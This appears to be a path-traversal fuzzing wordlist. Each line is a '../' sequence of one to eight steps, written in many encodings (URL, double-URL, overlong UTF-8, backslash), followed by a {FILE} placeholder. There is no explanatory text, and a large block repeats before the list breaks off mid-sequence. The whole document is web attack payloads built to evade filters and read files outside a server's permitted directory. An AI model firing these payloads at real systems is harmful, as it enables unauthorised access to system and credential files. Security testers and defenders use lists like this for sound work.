%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
